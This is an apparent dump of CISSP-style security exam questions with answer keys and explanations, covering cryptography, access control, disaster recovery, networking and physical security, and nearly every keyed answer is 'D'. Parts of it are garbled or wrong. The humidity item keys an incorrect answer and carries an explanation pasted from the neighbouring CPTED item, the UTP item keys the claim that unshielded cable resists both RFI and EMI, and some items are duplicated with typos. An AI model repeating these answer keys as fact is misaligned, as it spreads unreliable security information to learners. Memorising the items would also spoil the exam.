What process usually takes place after creating a DES session key? A. Key signing B. Key escrow C. Key clustering D. Key exchange

D. After a session key has been created, it must be exchanged securely. In most cryptosystems, an asymmetric key (the receiver's public key) is used to encrypt this session key, and it is sent to the receiver.

One of the actions that attackers typically attempt after compromising a system is to acquire the ability to mimic a normal privileged user. What is one way in which they may accomplish this? A. Rebooting the compromised host B. Exporting the password hash table C. Pivoting from the compromised host to another target D. Adding a privileged user account

D. After compromising a host, attackers may attempt a number of actions, but will typically attempt to blend in by acquiring administrative privileges. They can do this by either compromising a privileged account, adding a privileged account, or elevating the privileges of the account they compromised.

Gizmos and Gadgets has restored its original facility after a disaster. What should be moved in first? A. Management B. Most critical systems C. Most critical functions D. Least critical functions

D. After the primary site has been repaired, the least critical components are moved in first. This ensures that the primary site is really ready to resume processing. By doing this, you can validate that environmental controls, power, and communication links are working properly. It can also avoid putting the company into another disaster. If the less critical functions survive, then the more critical components of the company can be moved over.

Linda has found out that two people who work for her who do not have the clearance level to know about certain military troop movement have learned about the activity and sold the information to enemy states. Which of the following best describes what type of issue is Linda dealing with? A. Fraud. B. Phishing C. Pharming D. Aggregation.

D. Aggregation.

How is interface testing different from misuse case testing? a. Interface testing is intended to determine correct function, whereas misuse case testing is intended to determine error conditions. b.. Interface testing is intended to determine the usability, whereas misuse case testing is intended to determine when misuse has occurred. c.Interface testing and misuse case testing are essentially the same. d Interface testing is intended to determine correct function, whereas misuse case testing is intended to determine if an error condition could be problematic.

D. All apps must undergo interface testing to be properly functional and usable. But they should also undergo misuse case testing in order to determine whether an intentional misuse of them could result in an error that subverts the confidentiality, integrity, and availability of the data the app provides access to.

What is the value of layering security responsibility? A. Spreads accountability across the organization. B. Focuses specific responsibilities on the roles best able to accomplish them. C. Ensures separation of duties and encourages oversight. D. All of these choices.

D. All of these choices.

What are the key stages of account management? A. Provisioning or adding accounts, modifying accounts, and suspending accounts B. Adding accounts, deleting accounts, and deleting users' data C. Verifying account passwords, validating account usage, and deleting accounts D. Provisioning accounts, modifying accounts, auditing the use of accounts, and suspending accounts

D. All stages in the life cycle of authenticated access should be accounted for. Access should not be granted without appropriate direction, nor should access be allowed or denied without expected permissions. And the suspension of access should be auditable as well.

Integrity is a primary concept in many security models and policies. Which of the following statements is not consistent with the rules of integrity? A. approved subjects should never make unapproved modifications. B. The system should deal with internal and external activity the same way. C. unapproved subjects should never be allowed to make changes. D. All subjects must have a need-to-know.

D. All subjects must have a need-to-know.

During which phase or phases of the information life cycle can cryptography be an effective control? A. Use B. Archival C. Disposal D. All the above

D. All the above

Which of the following requirements should the data retention policy address? A. Legal B. Regulatory C. Operational D. All the above

D. All the above

The trusted computing base (TCB) contains which of the following? A. All trusted processes and software components B. All trusted security policies and implementation mechanisms C. All trusted software and design mechanisms D. All trusted software and hardware components

D. All trusted software and hardware components

Which of the following best describes a certificate authority? A. An organization that issues private keys and the corresponding algorithms B. An organization that validates encryption processes C. An organization that verifies encryption keys. D. An organization that issues certificates.

D. An organization that issues certificates.

Which of the following is not used for turning source code into machine or object code? A. Assembler B. Interpreter. C. Compiler. D. Analyzer.

D. Analyzer.

All of the following could be used to prevent shoulder surfing, except: A. Strategically placed monitors B. Awareness training C. High-walled cubicles D. Anti-emanation materials

D. Anti-emanation materials

SMTP lives at which OSI layer? A. Session B. Transmission C. Network D. Application.

D. Application.

The type of token device that employs a challenge response mechanism is which of the following? A. one-time password generator B. Token generator C. Synchronous D. Asynchronous

D. Asynchronous

The type of token device that employs a challenge response mechanism is which of the following? A. on-time password generator. B. Token Generator. C. Synchronous D. Asynchronous.

D. Asynchronous.

The importance of protecting audit logs generated by computers and network devices is highlighted by the fact that it is required by many of today's regulations. Which of the following does NOT explain why audit logs should be protected? A. If not properly protected, these logs may not be admissible during a prosecution. B. Audit logs contain sensitive data and should only be accessible to a certain subset of people. C. Intruders may attempt to scrub the logs to hide their activities. D. The format of the logs should be unknown and unavailable to the intruder.

D. Auditing tools are technical controls that track activity within a network, on a network device, or on a specific computer. Even though auditing is not an activity that will deny an entity access to a network or computer, it will track activities so that a security administrator can understand the types of access that took place, identify a security breach, or warn the administrator of suspicious activity. This information can be used to point out weaknesses of other technical controls and help the administrator understand where changes must be made to preserve the necessary security level within the environment. Intruders can also use this information to exploit those weaknesses, so audit logs should be protected through permissions, rights, and integrity controls, as in hashing algorithms. However, the format of systems logs is commonly standardized with all like systems. Hiding log formats is not a usual countermeasure and is not a reason to protect audit log files.

Which of the following provides an incorrect definition of the specific component or protocol that makes up IPSec? A. Authentication Header protocol provides data integrity, data origin authentication, and protection from replay attacks. B. Encapsulating Security Payload protocol provides confidentiality, data origin authentication, and data integrity. Internet Security Association and Key C. Management Protocol provides a framework for security association creation and key exchange. D. Internet Key Exchange provides authenticated keying material for use with encryption algorithms.

D. Authentication Header protocol provides data integrity, data origin authentication, and protection from replay attacks. Encapsulating Security Payload protocol provides confidentiality, data origin authentication, and data integrity. Internet Security Association and Key Management Protocol provides a framework for security association creation and key exchange. Internet Key Exchange provides authenticated keying material for use with ISAKMP.

The operations team is responsible for defining which data gets backed up and how often. Which type of backup process backs up files that have been modified since the last time all data was backed up? A. Incremental process B. Full backup C. Partial backup D. Differential process

D. Backups can be full, differential, or incremental, and are usually used in some type of combination with each other. Most files are not altered every day, so to save time and resources, it is best to devise a backup plan that does not continually back up data that has not been modified. Backup software reviews the archive bit setting when making its determination on what gets backed up and what does not. If a file is modified or created, the file system sets the archive bit to 1, and the backup software knows to back up that file. A differential process backs up the files that have been modified since the last full backup; in other words, the last time all the data was backed up. When the data needs to be restored, the full backup is laid down first, and then the differential backup is put down on top of it.

Use the following scenario to answer Questions 30-32. Susan has been told by her boss that she will be replacing the current security manager within her company. Her boss explained to her that operational security measures have not been carried out in a standard fashion, so some systems have proper security configurations and some do not. Her boss needs to understand how dangerous it is to have some of the systems misconfigured, along with what to do in this situation. Which of the following best describes what Susan needs to ensure the operations staff creates for proper configuration standardization? A. Dual control B. Redundancy C. Training D. Baselines

D. Baselines

What should Don's team put into place to stop the masquerading attacks that have been taking place? A. Dynamic packet-filtering firewall B. ARP spoofing protection C. Disable unnecessary ICMP traffic at edge routers D. SRPC

D. Basic RPC does not have authentication capabilities, which allows for masquerading attacks to take place. Secure RPC (SRPC) can be implemented, which requires authentication to take place before remote systems can communicate with each other. Authentication can take place using shared secrets, public keys, or Kerberos tickets.

Which of the following statements with respect to facial scans for biometric authentication is NOT true? A. a facial scan can be based on the unique structures of a face, including bone structure, eye widths, chin shapes, etc.., via visual imagery. B. A facial scan can be based on the unique pattern of heat emitted from an individual's face, which is itself based on a unique pattern of small blood vessels (capillaries) just beneath the surface of the skin. C. A facial scan can be based on the three-dimensional measurements of the topology of the face, using projection of infrared dots. D. Because of the various ways that facial scans can be performed, they are virtually impossible to forge or spoof.

D. Because of the various ways that facial scans can be performed, they are virtually impossible to forge or spoof.

The control objectives for information and related technology (cobit) is a framework and set of best practices. Which of the following provides an incorrect characteristic of COBIT? A. Developed by information system audit and control association (isaca) and the IT governance institute (ITGI) B. It defines the goals for the controls that should be used to properly manage IT and to ensure that IT maps to business needs.. C. A majority of regulation compliance and audits are built on COBIT framework. D. COBIT is broken down into five domains.

D. COBIT is broken down into five domains.

What type of computer memory improves system performance by acting as a special storage area for information that is retrieved often? A. primary B. virtual C. RAM D. Cache.

D. Cache.

Which of the following is the best way for Susan to illustrate to her boss the dangers of the current configuration issues? A. Map the configurations to the compliancy requirements. B. Compromise a system to illustrate its vulnerability. C. Audit the systems. D. Carry out a risk assessment.

D. Carry out a risk assessment.

Protecting evidence and providing accountability for who handled it at different steps during the investigation is referred to as what? A. Rule of best evidence. B. Hearsay. C. Evidence safety. D. Chain of custody.

D. Chain of custody.

Which of the following is not a reason why data should be classified? A. Classification forces valuation, which can be used to determine risk. B. Classification is required to determine appropriate access controls. C. Classification can be used to optimize security budget. D. Classification is required to develop secure systems.

D. Classification is required to develop secure systems.

Which of the following is not a reason why data should be classified? A. Classification forces valuation, which can be used to determine risk. B. Classification is required to determine appropriate access controls. C. classification can be used to optimize security budget. D. Classification is required to develop secure systems.

D. Classification is required to develop secure systems.

Which of the following is not a necessary characteristic of kerberos implementation? A Transparent. B Scalable. C. Reliable. D. Cohesive.

D. Cohesive.

Which of the following is not a necessary characteristic of kerberos implementation? A. Transparent. B. Scalable. C. Reliable. D. Cohesive.

D. Cohesive.

The least expensive and most difficult to test computer recovery site is a: A. non-mobile hot site. B. mobile hot site. C. warm site. D. Cold site.

D. Cold site.

John is asked by his manager to research an IDS for a new dispatching center. in his research, he finds the top five products and compares them against each other based upon their ratings. in order to get the most simplified and universal evaluation, which of the following should John use to make his decision? A. Red Book B. ITSEC C. Orange Book D. Common Criteria.

D. Common Criteria.

Which of the following statements correctly describes biometric methods? A. They are the least expensive and provide the most protection. B. They are the most expensive and provide the least protection. C. They are the least expensive and provide the least protection. D. They are the most expensive and provide the most protection.

D. Compared with the other available authentication mechanisms, biometric methods provide the highest level of protection and are the most expensive.

What is the main drawback of endpoint data leak protection (EDLP)? A. inspection B. Encryption C. Evasion D. Complexity.

D. Complexity.

Which of the following activities does the IAB consider a violation of the "ethics and the internet"? A. creating a computer virus. B. Selling a worm. C. install a honeypot. D. Compromises the privacy of users.

D. Compromises the privacy of users.

When implementing data leak prevention, which is the first, most critical step? A. examine the flow of sensitive data in your organization to better understand what is proper, and what should not be allowed. B. Conduct a risk assessment to determine what the best data protection strategy will be for your organization. C. Evaluate the features of the available products in order to determine which fits best in your organization's infrastructure. D. Conduct and inventory of all the data in your organization in order to characterize and prioritize its sensitivity.

D. Conduct and inventory of all the data in your organization in order to characterize and prioritize its sensitivity.

What is configuration management used for in many environments? A. controlling changes in testing procedures. B. controlling testing environments and documentation of testing. C. Ensuring changes in design and its verification process, testing, and implementation. D. Controlling changes in design and its verification of process, testing, and implementation.

D. Controlling changes in design and its verification of process, testing, and implementation.

Which of the following are services that cryptosystems can provide? A.Confidentiality, integrity, and availability B. Computation, authentication, and authorization C.I ntegrity, authentication, and accounting D. Confidentiality, integrity, and authentication

D. Cryptosystems can render data unintelligible except to authorized entities (confidentiality), can validate that data has not been altered (integrity), and can validate the identity of an entity (authentication).

How is it possible that anyone can know how a specific algorithm works and it can still provide protection through secrecy? A. The source code is not provided. B. The s-boxes are continually changed through the use of initialization vectors. C. no on has access to the keystream D. Cryptovariables provide the secrecy

D. Cryptovariables provide the secrecy

Alice needs to hire a third part to conduct a test of her company's security posture. If she needs to demonstrate that her company is compliant with the payment card industry's requirements for the protection of cardholder data, which of the following services should she select? A. Vulnerability assessment. B. Penetration test. C. Regulatory Audit. D. DSS Audit.

D. DSS Audit.

What layer does a bridge work at? A. session B. network C. transport D. Data link

D. Data link

A transition into the disposal phase of the information life cycle is most commonly triggered by A. Senior management B. Insufficient storage C. Acceptable use policies D. Data retention policies

D. Data retention policies

What does the term "data at rest" refer to, and how is it best protected? A. data that is not being actively used, though is encrypted during use. B. Data that may be in use, but is decrypted on disk so that it is accessible. C. Data that may be used later, and so is stored decrypted for when it is needed. D. Data that is not being actively used, and is encrypted while static.

D. Data that is not being actively used, and is encrypted while static.

Which of the following is the LEAST important stage in the life-cycle management of information? A. Data specification and classification B. Continuous monitoring and auditing of data access. C. Data archival D. Database migration.

D. Database migration.

Which is not one of the primary goals of BIA. A.Criticality prioritization B. Downtime estimation C. Determining requirements for critical business functions. D. Deciding on various tests to be performed to validate the business continuity plan.

D. Deciding on various tests to be performed to validate the business continuity plan.

Which is not one of the primary goals of BIA? A. Criticality prioritization B. Downtime estimation C. Determining requirements for critical business functions. D. Deciding on various tests to be performed to validate the business continuity plan.

D. Deciding on various tests to be performed to validate the business continuity plan.

An outline for a physical security design should include program categories and the necessary countermeasures for each. What category do lock and access controls belong to? A assessment. B. Deference. C. Response. D. Delay.

D. Delay.

The crafting of malformed packets, packet flooding, and ransomware are all potentially which of the following forms of network attack? A. Buffer overflows. B. Polymorphic worms. C. Source Spoofing. D. Denial of Service.

D. Denial of Service.

The crafting of malformed packets, packet flooding, and ransomware are all potentially which of the following forms of network attack? A. Buffer overflows B. Polymorphic worms C. Source spoofing D. Denial of service.

D. Denial of service.

A physical security program needs to be developed and maintained in a defense-in-depth model. Which of the following contain the necessary categories of a physical security program? A. Deterrence, Delaying, Prevention, Assessment, Response. B. Deterrence, Delaying, Detection, Analysis, Response. C. Deterrence, Delaying, Detection, Assessment, Recover, D. Deterrence, Delaying, Detection, Assessment, Response.

D. Deterrence, Delaying, Detection, Assessment, Response.

Which of the following describes a best practice for provisioning a new desktop system or server? A. Begin with a pristine installation media for the latest version of the operating system, and then apply all necessary patches to bring it to the current revision. B. Clone the new system from an existing system already patched to the latest revision that is function properly in deployment. C. Determine which services the new system requires, and enable only those for which there is a business need, on a case-by-case basis. D. Develop a hardened gold master and use it as the basis of all newly provisioned systems.

D. Develop a hardened gold master and use it as the basis of all newly provisioned systems.

Capability Maturity Model Integration (CMMI) is a process improvement approach that is used to help organizations improve their performance. The CMMI model may also be used as a framework for appraising the process maturity of the organization. Which of the following is an incorrect mapping of the levels that may be assigned to an organization based upon this model? A. Maturity Level 2 - Managed or Repeatable B. Maturity Level 3 - Defined C. Maturity Level 4 - Quantitatively Managed D. Maturity Level 5 - Optimizing A. i B. i, ii C. All of them D. None of them

D. Each answer provides the correct definition of the four levels that can be assigned to an organization during its evaluation against the CMMI model. This model can be used to determine how well the organization's processes compare to CMMI best practices, and to identify areas where improvement can be made. Maturity Level 1 is Initial.

Which best describes the purpose of the ALE calculation? A. Quantifies the security level of the environment B. Estimates the loss possible for a countermeasure C. Quantifies the cost/benefit result D. Estimates the loss potential of a threat in a span of a year

D. Estimates the loss potential of a threat in a span of a year

Which of the following best describes the mitigation of data remanence by a physical destruction process? A. Replacing the 1's and 0's that represent data on storage media with random or fixed patterns of 1's and 0's B. Converting the 1's and 0's that represent data with the output of a cryptographic function C. Removing or reducing the magnetic field patterns on conventional disk drives or tapes D. Exposing storage media to caustic or corrosive chemicals that render it unusable

D. Exposing storage media to caustic or corrosive chemicals that render it unusable

Choose the following answer that has the correct definitions for False Rejection Rate and False Acceptance Rae. A. FAlse Acceptance Rate is a Type I error and False Rejection Rate is a Type II error. B. False Acceptance Rate is the value of authorized individuals who were improperly rejected and False Rejection Rate is a Type I error. C. False Rejection Rate is a Type I error and False Acceptance Rate is the number of imposters who were rejected. D. False Rejection Rate is the amount of authorized users who were improperly rejected and the False Acceptance Rate is a Type II error.

D. False Rejection Rate is the amount of authorized users who were improperly rejected and the False Acceptance Rate is a Type II error.

Use the following scenario to answer Questions 25-27. Lenny is a new security manager for a retail company that is expanding its functionality to its partners and customers. The company's CEO wants to allow its partners' customers to be able to purchase items through the company's web stores as easily as possible. The CEO also wants the company's partners to be able to manage inventory across companies more easily. The CEO wants to be able to understand the network traffic and activities in a holistic manner, and he wants to know from Lenny what type of technology should be put into place to allow for a more proactive approach to stopping malicious traffic if it enters the network. The company is a high-profile entity constantly dealing with zero-day attacks. Which of the following is the best identity management technology that Lenny should consider implementing to accomplish some of the company's needs? A. LDAP directories for authoritative sources B. Digital identity provisioning C. Active Directory D. Federated identity

D. Federation identification allows for the company and its partners to share customer authentication information. When a customer authenticates to a partner website, that authentication information can be passed to the retail company, so when the customer visits the retail company's website, the user has to submit less user profile information and the authentication steps the user has to go through during the purchase process could potentially be reduced. If the companies have a set trust model and share the same or similar federated identity management software and settings, this type of structure and functionality is possible.

Which of the following is most resistant to the physical environment? A. Infrared. B. Free space optics C. Satellite D. Fiber Optics.

D. Fiber Optics.

Dispersion is a condition that affects which cabling type? A. Twisted pair. B. Broadband coaxial C. Directional Antennae D. Fiber optics.

D. Fiber optics.

Which of the following is most resistant to the physical environment? A. Infrared. B. Free space optics. C. Satellite. D. Fiber optics.

D. Fiber optics.

Bob has successfully tested enterprise's business continuity plan (BCP) in various ways, and now is tasked with performing the most rigorous test to assure its viability. Which of the following will provide this? A. Structured walk-through test. B. Simulation Test. C. Parallel test. D. Full-interruption test.

D. Full-interruption test.

Code reviews include all of the following except A. Ensuring the code conforms to applicable coding standards B. Discussing bugs, design issues, and anything else that comes up about the code C. Agreeing on a "disposition" for the code D. Fuzzing the code

D. Fuzzing is a technique for detecting flaws in the code by bombarding it with massive amounts of random data. This is not part of a code review, which focuses on analyzing the source code, not its response to random data.

Which of the following is not true of a circuit-switched network? A. acts as a dedicated virtual connection. B. is connection-oriented. C. Usually carries voice traffic. D. Has variable delays.

D. Has variable delays.

Use the following scenario to answer Questions 33-35. Tom's company has been experiencing many issues with unauthorized sniffers being installed on the network. One reason is because employees can plug their laptops, smartphones, and other mobile devices into the network, any of which may be infected and have a running sniffer that the owner is not aware of. Implementing VPNs will not work because all of the network devices would need to be configured for specific VPNs, and some devices, as in their switches, do not have this type of functionality available. Another issue Tom's team is dealing with is how to secure internal wireless traffic. While the wireless access points can be configured with digital certificates for authentication, pushing out and maintaining certificates on each wireless user device is cost prohibitive and will place too much of a burden on the network team. Tom's boss has also told him that the company needs to move from a landline metropolitan area network solution to a wireless solution. What should Tom's team implement to provide source authentication and data encryption at the data link level? A. IEEE 802.1AR B. IEEE 802.1AE C. IEEE 802.1AF D. IEEE 802.1X

D. IEEE 802.1AR provides a unique ID for a device. IEEE 802.1AE provides data encryption, integrity, and origin authentication functionality. IEEE 802.1AF carries out key agreement functions for the session keys used for data encryption. Each of these standards provides specific parameters to work within an IEEE 802.1X EAP-TLS framework. A recent version (802.1X-2010) has integrated IEEE 802.1AE and IEEE 802.1AR to support service identification and optional point-to-point encryption.

IPSec's main protocols are AH and ESP. Which of the following services does AH provide? A. Confidentiality and authentication B. Confidentiality and availability C. Integrity and accessibility D. Integrity and authentication

D. IPSec is made up of two main protocols, Authentication Header (AH) and Encapsulating Security Payload (ESP). AH provides system authentication and integrity, but not confidentiality or availability. ESP provides system authentication, integrity, and confidentiality, but not availability. Nothing within IPSec can ensure the availability of the system it is residing on.

Which is not a benefit of the Diameter Protocol? A. Allows for different services to be authenticated in one architecture instead of individual architectures. B. Allows for the use of mobile IP in existing environments C. Relieves the restriction of only being able to authenticate users over PPP and SLIP connections. D. Increases customer cost because of the different policy servers that must be maintained.

D. Increases customer cost because of the different policy servers that must be maintained.

The requirement of erasure is the end of the media life cycle if the media contains sensitive information. Which of the following best describes purging? A. Changing the polarization of the atoms on the media. B. it is unacceptable when media are to be reused in the same physical environment for the same purposes. C. Data formerly on the media is made unrecoverable by overwriting it with a pattern. D. Information is made unrecoverable, even with extraordinary effort.

D. Information is made unrecoverable.

What is the term used to describe the systematic evaluation of the exchange points between a graphical data system and the system's user? A. black box testing. B. Administrative testing. C. Stress testing. D. Interface Testing.

D. Interface Testing.

What is the term used to describe the systematic evaluation of the exchange points between a graphical data system and the system's user? A. Black box testing B. Administrative testing. C. Stress testing. D. Interface Testing.

D. Interface testing.

Which of the following is not a concern of a security professional considering the adoption of Internet of Things (IoT) devices? A. Weak or nonexistent authentication mechanisms B. Vulnerability of data at rest and data in motion C. Difficulty of deploying patches and updates D. High costs associated with connectivity

D. IoT devices run the gamut of cost, from the very cheap to the very expensive. Cost, among the listed options, is the least likely to be a direct concern for a security professional. Lack of authentication, encryption, and update mechanisms are much more likely to be significant issues in any IoT adoption plan.

What is the Network Time Protocol (NTP), and why is it important in security assessments? A. It is a peer-to-peer protocol for system time synchronization, and it is important to ensure that peer system's time-based authentication functions properly. B. It is a client/server protocol for system time synchronization, and it is important to ensure that peer systems's time-based authentication functions properly. C. It is a peer-to-peer protocol for system time synchronization, and it is important to ensure that system logs have timestamps that are consistent across all critical systems. D. It is a client/server protocol for system time synchronization, and it is important to ensure that system logs have timestamps that are consistent across all critical systems.

D. It is a client/server protocol for system time synchronization, and it is important to ensure that system logs have timestamps that are consistent across all critical systems.

Which of the following statements is true with respect to unshielded twisted pair (UTP) cabling? A. it is resistant to radio frequency interference (RFI) but not electromagnetic interference (EMI) B. It is resistant to electromagnetic interference (EMI) but not radio frequency interference (RFI) C. it is resistant to neither RFI nor EMI because it is not shielded. D. It is resistant to both RFI and EMI even though it is unshielded.

D. It is resistant to both RFI and EMI even though it is unshielded.

The effect of data aggregation on classification levels is best described by which of the following? A. Data classification standards apply to all the data within an organization. B. Aggregation is a disaster recovery technique with no effect on classification. C. A low-classification aggregation of data can be deconstructed into higher-classification data items. D. Items of low-classification data combine to create a higher-classification set.

D. Items of low-classification data combine to create a higher-classification set.

Which of the following is an example of a credential management system, also known as an identity management (IdM) system? A. A historic log of the activities performed by users once they have presented their credentials to a central authorizing system B. A database of the credentials that have been registered to each individual in an enterprise, in order to correlate users with usernames and locales C. A security information and event management (SIEM) system that contains the logs for various credentialing systems in the enterprise, for correlation of activities by ID D. A Kerberos Key Distribution Center (KDC) that contains the symmetric keys of all the entities and systems in a Kerberos realm, which can be centrally administered to ensure that it is up-to-date with respect to additions and deletions of keys

D. Kerberos is a common solution to credential and identity management, facilitating all the needs of such a system, including the creation of accounts across systems, the assignment of account details and privileges, and the decommissioning of accounts when they are no longer required. It is the core technology behind Microsoft's Active Directory, which is the most common IdM solution in an enterprise environment.

What is a key performance indicator (KPI)? A. Any attribute of the ISMS that can be described as a value B. The value of a factor at a particular point in time C. A derived value that is generated by comparing multiple measurements against each other or against a baseline D. An interpretation of one or more metrics that describes the effectiveness of the ISMS See the answer

D. Key performance indicators (KPIs) are used by managers to assess the effectiveness of any critical business function. In the context of security, KPIs are based on metrics and are meant to answer the following question: Are we managing our information security well enough?

Which of the following is the most commonly used implementation of a hierarchical database? A. directory access protocol. B. Xwindows C. Unix. D. Lightweight Directory Access Protocol

D. Ldap.

Maria has been tasked with reviewing and ultimately augmenting her organization's physical security. Of the following controls and approaches, which should be her highest priority to ensure are properly implemented? A. Physical facility access controls, such as mechanical and device locks, on all necessary ingress points B. Personnel access controls, such as badges, biometric systems, etc. C. External boundary controls, including perimeter intrusion detection and assessment system (PIDAS) fencing, security guards, etc. D. Layered facility access controls, with multiple internal and external ingress and egress controls

D. Like any other defensive security discipline, physical security can be effectively implemented only via a defense-in-depth strategy, through layered defenses. It must be based on the assumption that a determined attacker will find a way to bypass any specific control, and therefore compensating controls must be deployed to enable the defender to detect and correct for any given failure to prevent a breach. The other possible answers each constitute core components of a layered facility protection regime, but cannot be relied upon individually.

which of the following approaches is the most effective way for an organization to reduce its liability regarding the protection of private data? A. Collect any and all data that has business utility, but ensure that the legal team has reviewed and approved all policies with respect to it's protection. B. Never collect or store any privacy-protected data. C. Limit the amount of private data collected to that which is legally allowed. D. Limit the amount of private data collected to that which is required for business functions.

D. Limit the amount of private data collected to that which is required for business functions.

Code is released "in the wild" and its intent is to start deleting the data off of hard drives on 03-03-03 at 3:33pm. This code is best described as a: A. worm. B. snake. C. Stink bomb. D. Logic Bomb

D. Logic Bomb

Which of the following does not describe a key access control layer? A. Administrative controls, such as policies and procedures, supervisory structures, and security-awareness training. B. Physical controls, such as perimeter security, proper cabling, and work area segmentation. C. Technical controls, such as network architectures, firewalls, and encryption D. Logistical controls, such as product shipments, financial management, and human resource management.

D. Logistical controls, such as product shipments, financial management, and human resource management.

The algorithm that was accepted as the Data Encryption Standard (DES) was? A. El Gamal. B. IDEA C. RC5 D. Lucifer.

D. Lucifer.

in programming, what language type represents data in binary to the processor? A. Electrical signal language. B. Assembly language. C. high-level language. D. machine language.

D. Machine language.

. Who is ultimately responsible for making sure data is classified and protected? A. Data owners B. Users C. Administrators D. Management

D. Management

Who is ultimately responsible for making sure data is classified and protected? A. Data owners. B. Users. C. Administrators. D. Management.

D. Management.

Alice has to create a physical network topology that is the most fault-tolerant possible, and budget is no object. Which should she implement? A. Bus topology B. Ring topology C. Star topology D. Mesh topology

D. Mesh topology

If different keys generate the same ciphertext for the same message, what is this called? A. Collision B. Secure hashing C. MAC D. Key clustering

D. Message A was encrypted with key A and the result is ciphertext Y. If that same message A were encrypted with key B, the result should not be ciphertext Y. The ciphertext should be different because a different key was used. But if the ciphertext is the same, this occurrence is referred to as key clustering

Which of the following is not covered by valuable-paper insurance? A. inscribed, printed, and written documents B. Manuscripts C. Records D. Money and Securities.

D. Money and Securities.

What type of technology is represented in the graphic that follows? A. Asynchronous Transfer Mode B. Synchronous Optical Networks C. Frequency-division multiplexing D. Multiplexing

D. Multiplexing is a method of combining multiple channels of data over a single transmission path. The transmission is so fast and efficient that the ends do not realize they are sharing a line with many other entities. The systems "think" they have the line all to themselves. Telephone systems have been around for about 100 years, and they started as copper-based analog systems. Central switching offices connected individual telephones manually (via human operators) at first, and later by using electronic switching equipment. After two telephones were connected, they had an end-to-end connection, or an end-to-end circuit. Multiple phone calls were divided up and placed on the same wire, which is multiplexing.

Sam has to lay out his company's IDS schematic. The VPN connections stop at the security gateway and there are three SSL connections that take place from the gateway to the database, Web server, and file server. Which is the best implementation for this environment? A. HIDS in all segments that need to be monitored and a NIDS on at least the database, Web Server, and File Server. B. NIDS in the DMZ and internal user network and HIDS on each system in the environment. C. NIDS in the DMZ, Internal user network, and Outside the firewall and HIDS on the database. D. NIDS in all segments that need to be monitored and a HIDS on at least the database, web server, and file server.

D. NIDS in all segments that need to be monitored and a HIDS on at least the database, web server, and file server.

Which of the following is not a main component of CPTED? A. Natural access control B. Natural surveillance C. Territorial reinforcement D. Target hardening

D. Natural access control is the use of the environment to control access to entry points, such as using landscaping and bollards. An example of natural surveillance is the construction of pedestrian walkways so there is a clear line of sight of all the activities in the surroundings. Territorial reinforcement gives people a sense of ownership of a property, giving them a greater tendency to protect it. These concepts are all parts of CPTED. Target hardening has to do with implementing locks, security guards, and proximity devices.

Which problems may be caused by humidity in an area with electrical devices? A. High humidity causes excess electricity, and low humidity causes corrosion. B. High humidity causes corrosion, and low humidity causes static electricity. C. High humidity causes power fluctuations, and low humidity causes static electricity. D. High humidity causes corrosion, and low humidity causes power fluctuations.

D. Natural access control is the use of the environment to control access to entry points, such as using landscaping and bollards. An example of natural surveillance is the construction of pedestrian walkways so there is a clear line of sight of all the activities in the surroundings. Territorial reinforcement gives people a sense of ownership of a property, giving them a greater tendency to protect it. These concepts are all parts of CPTED. Target hardening has to do with implementing locks, security guards, and proximity devices.

As a security analyst writing a technical report about the findings of a technical security assessment, what should your primary goal be? A. Detailing as much of the raw data that went into the report as possible so that operations staff has absolutely everything they need to understand the issues that need to be remediated B. Providing step-by-step remediation advice for each of the most critical findings so that corrections can be deployed as easily and rapidly as possible C. Distilling the findings of the assessment into an executive summary, accessible to all levels of management D. Constructing a cogent and compelling narrative that will persuade the intended audience to enact the measures necessary to reduce critical risks to the business mission, based on an honest and factual analysis

D. No amount of raw details, step-by-step remediation instructions, or easily digestible high-level overview presented following a security assessment will matter if the resulting report is not delivered in a compelling and convincing manner. Beyond what is important and what must be done about it, why it is important must be the key takeaway.

The use of "resource servers" and "authorization servers" to enable a "client" web service (such as LinkedIn) to access a "resource owner" (such as Google) for federated authorization is a hallmark of what open standard? A. OpenID B. SAML C. SSO D. OAuth

D. OAuth is an open standard for website-to-website authorization (not authentication). It is used to allow an account that a user is authenticated to on one site to access resources on another third-party site.

What is COBIT and where does it fit into the development of information security systems and security programs? A. Lists of standards, procedures, and policies for security program development B. Current version of ISO 17799 C. A framework that was developed to deter organizational internal fraud D. Open standards for control objectives

D. Open standards for control objectives

Which of the following protocols would an Identity as a Service (IDaaS) provider use to authenticate you to a third party? A. Diameter B. OAuth C. Kerberos D. OpenID

D. OpenID is an open standard for user authentication by third parties. Though it is possible to use OAuth, which is an authorization standard, for authentication, you would do so by leveraging its OpenID Connect layer. Diameter and Kerberos are not well-suited for IDaaS.

If Joe wanted to use a risk assessment methodology that allows the various business owners to identify risks and know how to deal with them, what methodology would he use? A. Qualitative B. COSO C. FRAP D. OCTAVE

D. Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE) is a methodology that is intended to be used in situations where people manage and direct the risk evaluation for information security within their company. This places the people who work inside the organization in the position of being able to make decisions regarding the best approach for evaluating the security of their organization.

Which of the following is not a purpose to develop and implement a disaster recovery plan? A. provides procedures for emergency responses. B. Extends backup operations to include more than just backing up data. C. Provides steps for a post-disaster recovery. D. Outlines business functions and systems.

D. Outlines business functions and systems.

Which of the following is not a characteristic of the Protected Extensible Authentication Protocol? A. Authentication protocol used in wireless networks and point-to-point connections B. Designed to provide authentication for 802.11 WLANs C. Designed to support 802.1X port access control and Transport Layer Security D. Designed to support password-protected connections

D. PEAP is a version of EAP and is an authentication protocol used in wireless networks and point-to-point connections. PEAP is designed to provide authentication for 802.11 WLANs, which support 802.1X port access control and TLS. It is a protocol that encapsulates EAP within a potentially encrypted and authenticated TLS tunnel.

What is the technology that allows a user to remember just one password? A. Password generation B. Password dictionaries C. Password rainbow tables D. Password synchronization

D. Password synchronization technologies can allow a user to maintain just one password across multiple systems. The product will synchronize the password to other systems and applications, which happens transparently to the user.

All of the following controls are important to specify when defining a data classification scheme, except: A. Marking, labeling, and handling procedures. B. Physical security protections C. Backup and recovery procedures D. Personnel clearance procedures.

D. Personnel clearance procedures.

The most costly countermeasure to reducing physical security risks is often: A. Procedural controls B. Hardware devices C. Electronic controls D. Personnel.

D. Personnel.

What type of exploited vulnerability allows more input than the program has allocated space to store it? A. Symbolic links B.File descriptors C.Kernel flaws D Buffer overflows

D. Poor programming practices allow more input than the software has allocated space to store it. This overwrites data or program memory after the end of the allocated buffer, and sometimes it allows the attacker to inject program code and then cause the processor to execute it in what is called a buffer overflow. This gives the attacker the same level of access as that held by the software that was successfully attacked. If the program was run as an administrative user or by the system itself, this can mean complete access to the system. Good programming practice, automated source code scanners, enhanced programming libraries, and strongly typed languages that disallow buffer overflows are all ways of reducing this type of vulnerability.

